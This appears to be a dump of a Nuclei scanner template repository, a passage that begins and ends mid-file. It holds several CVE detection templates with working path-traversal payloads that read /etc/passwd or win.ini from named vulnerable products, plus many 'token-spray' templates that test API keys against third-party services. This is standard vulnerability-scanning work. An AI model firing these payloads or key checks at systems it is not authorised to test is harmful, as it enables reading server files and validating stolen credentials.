8 | reference: 9 | - https://www.exploit-db.com/exploits/37252 10 | - https://nvd.nist.gov/vuln/detail/CVE-2015-9480 11 | classification: 12 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 13 | cvss-score: 7.5 14 | cve-id: CVE-2015-9480 15 | cwe-id: CWE-22 16 | tags: cve,cve2015,wordpress,wp-plugin,lfi 17 | 18 | requests: 19 | - method: GET 20 | path: 21 | - "{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk" 22 | 23 | matchers-condition: and 24 | matchers: 25 | - type: regex 26 | regex: 27 | - "root:.*:0:0:" 28 | part: body 29 | - type: status 30 | status: 31 | - 200 32 | 33 | # Enhanced by mp on 2022/04/20 34 | -------------------------------------------------------------------------------- /CVE-2018-16288.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-16288 2 | 3 | info: 4 | name: LG SuperSign EZ CMS 2.5 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: LG SuperSign CMS allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs. 
8 | reference: 9 | - https://www.exploit-db.com/exploits/45440 10 | - https://www.cvedetails.com/cve/CVE-2018-16288 11 | - http://mamaquieroserpentester.blogspot.com/2018/09/multiple-vulnerabilities-in-lg.html 12 | - https://www.exploit-db.com/exploits/45440/ 13 | classification: 14 | cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N 15 | cvss-score: 8.6 16 | cve-id: CVE-2018-16288 17 | cwe-id: CWE-200 18 | tags: cve,cve2018,lfi 19 | 20 | requests: 21 | - method: GET 22 | path: 23 | - "{{BaseURL}}/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd" 24 | 25 | matchers-condition: and 26 | matchers: 27 | 28 | - type: regex 29 | regex: 30 | - "root:.*:0:0:" 31 | 32 | - type: status 33 | status: 34 | - 200 35 | -------------------------------------------------------------------------------- /CVE-2018-19458.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-19458 2 | 3 | info: 4 | name: PHP Proxy 3.0.3 - Local File Inclusion 5 | author: daffainfo 6 | severity: high 7 | description: In PHP Proxy 3.0.3, any user can read files from the server without authentication due to an index.php?q=file:/// LFI URI, a different vulnerability than CVE-2018-19246. 
8 | reference: 9 | - https://www.exploit-db.com/exploits/45780 10 | - https://www.cvedetails.com/cve/CVE-2018-19458 11 | - https://www.exploit-db.com/exploits/45780/ 12 | - https://pentest.com.tr/exploits/PHP-Proxy-3-0-3-Local-File-Inclusion.html 13 | classification: 14 | cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 15 | cvss-score: 7.5 16 | cve-id: CVE-2018-19458 17 | cwe-id: CWE-287 18 | tags: cve,cve2018,lfi,proxy 19 | 20 | requests: 21 | - method: GET 22 | path: 23 | - "{{BaseURL}}/index.php?q=file:///etc/passwd" 24 | 25 | matchers-condition: and 26 | matchers: 27 | 28 | - type: regex 29 | regex: 30 | - "root:.*:0:0:" 31 | 32 | - type: status 33 | status: 34 | - 200 35 | -------------------------------------------------------------------------------- /CVE-2019-20085.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2019-20085 2 | 3 | info: 4 | name: TVT NVMS 1000 - Directory Traversal 5 | author: daffainfo 6 | severity: high 7 | description: TVT NVMS-1000 devices allow GET /.. 
Directory Traversal 8 | reference: 9 | - https://nvd.nist.gov/vuln/detail/CVE-2019-20085 10 | - https://www.exploit-db.com/exploits/48311 11 | - https://www.exploit-db.com/exploits/47774 12 | - http://packetstormsecurity.com/files/157196/TVT-NVMS-1000-Directory-Traversal.html 13 | classification: 14 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 15 | cvss-score: 7.5 16 | cve-id: CVE-2019-20085 17 | cwe-id: CWE-22 18 | tags: cve,cve2019,iot,lfi,cisa 19 | 20 | requests: 21 | - method: GET 22 | path: 23 | - "{{BaseURL}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini" 24 | 25 | matchers-condition: and 26 | matchers: 27 | - type: regex 28 | regex: 29 | - "\\[(font|extension|file)s\\]" 30 | part: body 31 | - type: status 32 | status: 33 | - 200 34 | -------------------------------------------------------------------------------- /CVE-2020-35598.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-35598 2 | 3 | info: 4 | name: Advanced Comment System 1.0 - Path Traversal 5 | author: daffainfo 6 | severity: high 7 | description: ACS Advanced Comment System 1.0 is affected by Directory Traversal via an advanced_component_system/index.php?ACS_path=..%2f URI. 
8 | reference: 9 | - https://www.exploit-db.com/exploits/49343 10 | - https://www.cvedetails.com/cve/CVE-2020-35598 11 | - https://seclists.org/fulldisclosure/2020/Dec/13 12 | classification: 13 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 14 | cvss-score: 7.5 15 | cve-id: CVE-2020-35598 16 | cwe-id: CWE-22 17 | tags: cve,cve2020,lfi 18 | 19 | requests: 20 | - method: GET 21 | path: 22 | - "{{BaseURL}}/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00" 23 | 24 | matchers-condition: and 25 | matchers: 26 | 27 | - type: regex 28 | regex: 29 | - "root:.*:0:0:" 30 | 31 | - type: status 32 | status: 33 | - 200 34 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # my-nuclei-templates 2 | Some contributions in the nuclei-templates repository 3 | -------------------------------------------------------------------------------- /acrolinx-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: acrolinx-workflow 2 | 3 | info: 4 | name: Acrolinx Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Acrolinx related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/acrolinx-dashboard.yaml 10 | subtemplates: 11 | - tags: acrolinx 12 | -------------------------------------------------------------------------------- /activemq-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: activemq-workflow 2 | 3 | info: 4 | name: ActiveMQ Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all ActiveMQ related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: exposed-panels/activemq-panel.yaml 10 | subtemplates: 11 | - tags: activemq 12 | -------------------------------------------------------------------------------- /admin-word-count-column-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: admin-word-count-column-lfi 2 | 3 | info: 4 | name: Admin word count column 2.2 - Arbitrary File Retrieval 5 | author: daffainfo,Splint3r7 6 | severity: high 7 | reference: 8 | - https://packetstormsecurity.com/files/166476/WordPress-Admin-Word-Count-Column-2.2-Local-File-Inclusion.html 9 | - https://wordpress.org/plugins/admin-word-count-column/ 10 | tags: wordpress,wp-plugin,lfi,wp 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - '{{BaseURL}}/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0' 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: regex 20 | regex: 21 | - "root:[x*]:0:0" 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /adminer-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: adminer-workflow 2 | 3 | info: 4 | name: Adminer Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Adminer related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: exposed-panels/adminer-panel.yaml 10 | subtemplates: 11 | - tags: adminer -------------------------------------------------------------------------------- /ambari-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: ambari-workflow 2 | 3 | info: 4 | name: Ambari Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Ambari related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: exposed-panels/ambari-exposure.yaml 10 | subtemplates: 11 | - tags: ambari 12 | -------------------------------------------------------------------------------- /amministrazione-aperta-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: amministrazione-aperta-lfi 2 | 3 | info: 4 | name: Amministrazione Aperta 3.7.3 - Unauthenticated Local File Read 5 | author: daffainfo,Splint3r7 6 | severity: high 7 | reference: 8 | - https://www.exploit-db.com/exploits/50838 9 | - https://wordpress.org/plugins/amministrazione-aperta 10 | tags: wordpress,wp-plugin,lfi,wp 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - '{{BaseURL}}/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd' 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: regex 20 | regex: 21 | - "root:[x*]:0:0" 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /apereo-cas-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: apereo-cas-workflow 2 | 3 | info: 4 | name: Apereo CAS Security Checks 5 | author: daffainfo 6 | description: A simple workflow that runs all Apereo CAS related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: exposed-panels/cas-login.yaml 10 | subtemplates: 11 | - tags: cas 12 | -------------------------------------------------------------------------------- /api-1forge.yaml: -------------------------------------------------------------------------------- 1 | id: api-1forge 2 | 3 | info: 4 | name: 1Forge API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://1forge.com/api 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Currency%20Exchange/1Forge.md 10 | tags: token-spray,1forge 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.1forge.com/quota?api_key={{token}}" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"quota_used":' 23 | - '"quota_limit":' 24 | - '"quota_remaining":' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-abstractapi.yaml: -------------------------------------------------------------------------------- 1 | id: api-abstractapi 2 | 3 | info: 4 | name: Abstract Api Public Holidays Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://www.abstractapi.com/holidays-api 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Calendar/Abstract%20Public%20Holidays.md 10 | tags: token-spray,abstractapi 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://holidays.abstractapi.com/v1/?api_key={{token}}&country=GB&year=2021&month=1&day=25" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"name_local":' 23 | - '"location":' 24 | - '"date_year":' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-abuseipdb.yaml: -------------------------------------------------------------------------------- 1 | id: api-abuseipdb 2 | 3 | info: 4 | name: AbuseIPDB API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | 
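- https://docs.abuseipdb.com/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AbuseIPDB.md 10 | tags: token-spray,abuseipdb 11 | 12 | self-contained: true 13 | requests: # NOTE(review): the key is checked with a POST to /api/v2/report, which appears to submit a report for 127.0.0.1 under the key owner's account; a read-only endpoint would avoid that side effect. Content-Length below is the byte length of the form body (82). 14 | - raw: 15 | - | 16 | POST https://api.abuseipdb.com/api/v2/report HTTP/1.1 17 | Host: api.abuseipdb.com 18 | Key: {{token}} 19 | Accept: application/json 20 | Content-Type: application/x-www-form-urlencoded 21 | Content-Length: 82 22 | 23 | ip=127.0.0.1&categories=18,22&comment=SSH%20login%20attempts%20with%20user%20root. 24 | 25 | matchers: 26 | - type: word 27 | part: body 28 | words: 29 | - 'data":' 30 | - 'ipAddress":' 31 | condition: and 32 | -------------------------------------------------------------------------------- /api-adoptapet.yaml: -------------------------------------------------------------------------------- 1 | id: api-adoptapet 2 | 3 | info: 4 | name: AdoptAPet API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://www.adoptapet.com/public/apis/pet_list.html 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/AdoptAPet.md 10 | tags: token-spray,adoptapet 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.adoptapet.com/search/pets_at_shelter?key={{token}}&v=2&output=json&shelter_id=79570&start_number=1&end_number=500" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - 'returned_pets":' 23 | - 'total_pets":' 24 | condition: and 25 | -------------------------------------------------------------------------------- /api-alchemy.yaml: -------------------------------------------------------------------------------- 1 | id: api-alchemy 2 | 3 | info: 4 | name: Alchemy API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://docs.alchemy.com/alchemy/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Alchemy.md 10 | tags: token-spray,alchemy 11 | 12 | self-contained: true 13 | requests: 14 | - method: 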
POST 15 | path: 16 | - "https://eth-mainnet.alchemyapi.io/v2/{{token}}" 17 | body: '{"jsonrpc":"2.0","method":"eth_blockNumber","params":[],"id":0}' 18 | 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - '"id":' 24 | - '"result":' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-alienvault.yaml: -------------------------------------------------------------------------------- 1 | id: api-alienvault 2 | 3 | info: 4 | name: AlienVault Open Threat Exchange (OTX) API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://otx.alienvault.com/api 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/AlienVault%20Open%20Threat%20Exchange.md 10 | tags: token-spray,alienvault,exchange 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://otx.alienvault.com/api/v1/pulses/subscribed?page=1 HTTP/1.1 17 | Host: otx.alienvault.com 18 | X-OTX-API-KEY: {{token}} 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"$schema":' 25 | - '"properties":' 26 | condition: and 27 | -------------------------------------------------------------------------------- /api-amdoren.yaml: -------------------------------------------------------------------------------- 1 | id: api-amdoren 2 | 3 | info: 4 | name: Amdoren API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://www.amdoren.com/currency-api/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Currency%20Exchange/Amdoren.md 10 | tags: token-spray,amdoren 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://www.amdoren.com/api/currency.php?api_key={{token}}&from=USD&to=EUR" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"error" : 0' 23 | - '"error_message" : "-"' 24 | condition: and 25 | -------------------------------------------------------------------------------- 
/api-aniapi.yaml: -------------------------------------------------------------------------------- 1 | id: api-aniapi 2 | 3 | info: 4 | name: AniAPI API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://aniapi.com/docs/authentication 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Anime/AniAPI.md 10 | tags: token-spray,aniapi 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.aniapi.com/v1/auth/me" 17 | headers: 18 | Authorization: Bearer {{token}} 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"username":' 25 | - '"data":' 26 | condition: and 27 | -------------------------------------------------------------------------------- /api-bhagavadgita.yaml: -------------------------------------------------------------------------------- 1 | id: api-bhagavadgita 2 | 3 | info: 4 | name: Bhagavad Gita API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://docs.bhagavadgitaapi.in/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Books/Bhagavad%20Gita.md 10 | tags: token-spray,bhagavadgita 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://bhagavadgitaapi.in/slok?api_key={{token}}" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"chapter"' 23 | - '"verse"' 24 | - '"slok"' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-bible.yaml: -------------------------------------------------------------------------------- 1 | id: api-bible 2 | 3 | info: 4 | name: API.Bible API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://docs.api.bible 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Books/API%20Bible.md 10 | tags: token-spray,bible 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - 
"https://api.scripture.api.bible/v1/bibles/a6aee10bb058511c-02/verses/JHN.3.16?fums-version=3" 17 | headers: 18 | api-key: "{{token}}" 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - "orgId" 25 | - "bookId" 26 | - "bibleId" 27 | condition: and 28 | -------------------------------------------------------------------------------- /api-binance.yaml: -------------------------------------------------------------------------------- 1 | id: api-binance 2 | 3 | info: 4 | name: Binance REST API 5 | author: geeknik 6 | severity: info 7 | reference: 8 | - https://github.com/binance/binance-spot-api-docs/blob/master/rest-api.md 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Binance.md 10 | tags: token-spray,binance 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.binance.com/api/v3/historicalTrades" 17 | headers: 18 | X-MBX-APIKEY: "{{token}}" 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"id":' 25 | - '"price":' 26 | - '"quoteQty":' 27 | condition: and -------------------------------------------------------------------------------- /api-bitcoinaverage.yaml: -------------------------------------------------------------------------------- 1 | id: api-bitcoinaverage 2 | 3 | info: 4 | name: BitcoinAverage API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://apiv2.bitcoinaverage.com/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/BitcoinAverage.md 10 | tags: token-spray,bitcoinaverage 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://apiv2.bitcoinaverage.com/exchanges/ticker/bitstamp HTTP/1.1 17 | Host: apiv2.bitcoinaverage.com 18 | x-ba-key: {{token}} 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"name"' 25 | - '"display_name"' 26 | - '"url"' 27 | condition: and 28 | 
-------------------------------------------------------------------------------- /api-bitquery.yaml: -------------------------------------------------------------------------------- 1 | id: api-bitquery 2 | 3 | info: 4 | name: Bitquery API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://graphql.bitquery.io/ide 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Blockchain/Bitquery.md 10 | tags: token-spray,bitquery 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | POST https://graphql.bitquery.io HTTP/1.1 17 | Host: graphql.bitquery.io 18 | X-API-KEY: {{token}} 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"message": "No query string was present"' 25 | -------------------------------------------------------------------------------- /api-bitrise.yaml: -------------------------------------------------------------------------------- 1 | id: api-bitrise 2 | 3 | info: 4 | name: Bitrise API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://api-docs.bitrise.io/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Continous%20Integration/Bitrise.md 10 | tags: token-spray,bitrise 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://api.bitrise.io/v0.1/me HTTP/1.1 17 | Host: api.bitrise.io 18 | Authorization: {{token}} 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"username":' 25 | - '"slug":' 26 | - '"email":' 27 | condition: and 28 | -------------------------------------------------------------------------------- /api-block.yaml: -------------------------------------------------------------------------------- 1 | id: api-block 2 | 3 | info: 4 | name: block.io API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://block.io/docs/basic 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Block.md 10 | tags: token-spray,block 11 | 12 | self-contained: 
true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://block.io/api/v2/get_balance/?api_key={{token}}" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"network"' 23 | - '"available_balance"' 24 | - '"pending_received_balance"' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-blockchain.yaml: -------------------------------------------------------------------------------- 1 | id: api-blockchain 2 | 3 | info: 4 | name: Blockchain API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://api.blockchain.com/v3/#/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Blockchain.md 10 | classification: 11 | cwe-id: CWE-200 12 | tags: token-spray,blockchain 13 | 14 | self-contained: true 15 | requests: 16 | - raw: 17 | - | 18 | GET https://api.blockchain.com/v3/exchange/accounts HTTP/1.1 19 | Host: api.blockchain.com 20 | X-API-Token: {{token}} 21 | 22 | matchers: 23 | - type: word 24 | part: body 25 | words: 26 | - '"currency"' 27 | - '"balance"' 28 | - '"available"' 29 | condition: and 30 | 31 | # Enhanced by cs on 2022/02/28 32 | -------------------------------------------------------------------------------- /api-blockfrost.yaml: -------------------------------------------------------------------------------- 1 | id: api-blockfrost 2 | 3 | info: 4 | name: Blockfrost API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://docs.blockfrost.io/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Blockfrost.md 10 | tags: token-spray,blockfrost 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://cardano-mainnet.blockfrost.io/api/v0/ HTTP/1.1 17 | Host: cardano-mainnet.blockfrost.io 18 | project_id: {{token}} 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"url":' 25 | - '"version":' 26 | condition: and 27 | 
-------------------------------------------------------------------------------- /api-box.yaml: -------------------------------------------------------------------------------- 1 | id: api-box 2 | 3 | info: 4 | name: Box API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://developer.box.com/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/Box.md 10 | tags: token-spray,box 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://api.box.com/2.0/collections HTTP/1.1 17 | Host: api.box.com 18 | Authorization: Bearer {{token}} 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - 'total_count":' 25 | - 'limit":' 26 | condition: and 27 | -------------------------------------------------------------------------------- /api-bravenewcoin.yaml: -------------------------------------------------------------------------------- 1 | id: api-bravenewcoin 2 | 3 | info: 4 | name: Brave New Coin API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://bravenewcoin.com/developers 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Brave%20New%20Coin.md 10 | tags: token-spray,bravenewcoin 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://bravenewcoin.p.rapidapi.com/market HTTP/1.1 17 | X-Rapidapi-Host: bravenewcoin.p.rapidapi.com 18 | X-Rapidapi-Key: {{token}} 19 | Host: bravenewcoin.p.rapidapi.com 20 | 21 | matchers: 22 | - type: word 23 | part: body 24 | words: 25 | - '"content":' 26 | - '"id":' 27 | - '"baseAssetId":' 28 | - '"quoteAssetId":' 29 | condition: and 30 | -------------------------------------------------------------------------------- /api-calendarific.yaml: -------------------------------------------------------------------------------- 1 | id: api-calendarific 2 | 3 | info: 4 | name: Calendarific API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - 
https://calendarific.com/api-documentation 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Calendar/Calendarific.md 10 | tags: token-spray,calendarific 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://calendarific.com/api/v2/holidays?api_key={{token}}&country=US&year=2021" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"holidays"' 23 | - '"name"' 24 | - '"description"' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-charity.yaml: -------------------------------------------------------------------------------- 1 | id: api-charity # Sends {{token}} as user_key to the OrgHunter charitybasic endpoint; matches on HTTP 200 plus three JSON keys in the body. 2 | 3 | info: 4 | name: Charity Search API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - http://charityapi.orghunter.com/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Business/Charity%20Search.md 10 | tags: token-spray,charity,search 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "http://data.orghunter.com/v1/charitybasic?user_key={{token}}&ein=590774235" # NOTE(review): plain http, so the key under test crosses the network unencrypted in the query string; switch to https if the service offers it (not verified here). 17 | 18 | matchers-condition: and 19 | matchers: 20 | - type: status 21 | status: 22 | - 200 23 | 24 | - type: word 25 | part: body 26 | words: 27 | - '"ein":' 28 | - '"name":' 29 | - '"inCareOfName"' 30 | condition: and 31 | -------------------------------------------------------------------------------- /api-clearbit.yaml: -------------------------------------------------------------------------------- 1 | id: api-clearbit 2 | 3 | info: 4 | name: Clearbit API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://clearbit.com/docs 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Business/Clearbit.md 10 | tags: token-spray,clearbit 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://person.clearbit.com/v2/combined/find?email=alex@clearbit.com HTTP/1.1 17 | Authorization: Basic {{base64(token + ':')}} 18 | 
Host: person.clearbit.com 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"person":' 25 | - '"id":' 26 | - '"name":' 27 | condition: and 28 | -------------------------------------------------------------------------------- /api-coinapi.yaml: -------------------------------------------------------------------------------- 1 | id: api-coinapi 2 | 3 | info: 4 | name: CoinAPI API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://docs.coinapi.io/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/CoinAPI.md 10 | tags: token-spray,coinapi 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://rest.coinapi.io/v1/exchanges HTTP/1.1 17 | Host: rest.coinapi.io 18 | X-CoinAPI-Key: {{token}} 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"exchange_id":' 25 | - '"website":' 26 | - '"name":' 27 | condition: and 28 | -------------------------------------------------------------------------------- /api-coinlayer.yaml: -------------------------------------------------------------------------------- 1 | id: api-coinlayer 2 | 3 | info: 4 | name: Coinlayer API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://coinlayer.com/documentation 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Coinlayer.md 10 | tags: token-spray,coinlayer 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - "https://api.coinlayer.com/live?access_key={{token}}" 17 | 18 | matchers: 19 | - type: word 20 | part: body 21 | words: 22 | - '"success"' 23 | - '"terms"' 24 | - '"privacy"' 25 | condition: and 26 | -------------------------------------------------------------------------------- /api-coinmarketcap.yaml: -------------------------------------------------------------------------------- 1 | id: api-coinmarketcap 2 | 3 | info: 4 | name: CoinMarketCap API Test 5 | author: daffainfo 6 | severity: info 
7 | reference: 8 | - https://coinmarketcap.com/api/documentation/v1 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/CoinMarketCap.md 10 | tags: token-spray,coinmarketcap 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://pro-api.coinmarketcap.com/v1/cryptocurrency/listings/latest HTTP/1.1 17 | Host: pro-api.coinmarketcap.com 18 | X-CMC_PRO_API_KEY: {{token}} 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"name"' 25 | - '"symbol"' 26 | - '"cmc_rank"' 27 | condition: and 28 | -------------------------------------------------------------------------------- /api-coinranking.yaml: -------------------------------------------------------------------------------- 1 | id: api-coinranking 2 | 3 | info: 4 | name: Coinranking API Test 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://developers.coinranking.com/api/documentation 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Cryptocurrency/Coinranking.md 10 | tags: token-spray,coinranking 11 | 12 | self-contained: true 13 | requests: 14 | - raw: 15 | - | 16 | GET https://api.coinranking.com/v2/exchanges HTTP/1.1 17 | Host: api.coinranking.com 18 | x-access-token: {{token}} 19 | 20 | matchers: 21 | - type: word 22 | part: body 23 | words: 24 | - '"exchanges"' 25 | - '"coinrankingUrl"' 26 | - '"uuid"' 27 | condition: and 28 | -------------------------------------------------------------------------------- /api-cooperhewitt.yaml: -------------------------------------------------------------------------------- 1 | id: api-cooperhewitt 2 | 3 | info: 4 | name: Cooper Hewitt API 5 | author: daffainfo 6 | severity: info 7 | reference: 8 | - https://collection.cooperhewitt.org/api/methods/ 9 | - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Cooper%20Hewitt.md 10 | tags: token-spray,cooperhewitt 11 | 12 | self-contained: true 13 | requests: 14 | - method: GET 15 | path: 16 | - 
